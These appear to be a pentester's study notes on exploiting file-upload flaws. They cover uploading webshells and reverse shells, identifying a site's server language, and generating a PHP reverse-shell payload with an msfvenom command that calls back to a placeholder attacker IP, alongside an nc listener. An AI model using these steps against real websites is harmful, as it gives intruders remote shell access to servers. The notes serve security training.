Basic Exploitation

Absent Validation

• upload any type of file
• usually we use a webshell or a reverse shell to test this
• For webshell:
  • we need to upload/write a webshell in the same language.
  • we can know the language from the file extension.
• When the web framework is using routes, the extension is not seen
  • file upload exploitation would also be different, as our uploaded files may not be directly routable or accessible.
  • determine what language runs the web application is to visit the /index.ext page, where we would swap out ext with various common web extensions, like php, asp, aspx, among others, to see whether any of them exist.
  • we can use burp fuzzing using this wordlist - https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt
  • not always accurate
  • We can also use https://www.wappalyzer.com/

---

Upload Exploitation

• use seclists/web0shells
• phpbash.php
• Custom webshells using GET
• Reverse shells:
  • https://github.com/pentestmonkey/php-reverse-shell
  • SecLists
  • Change IP/port
  • start nc server on our attackbox
• Custom Reverse Shells
  • msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php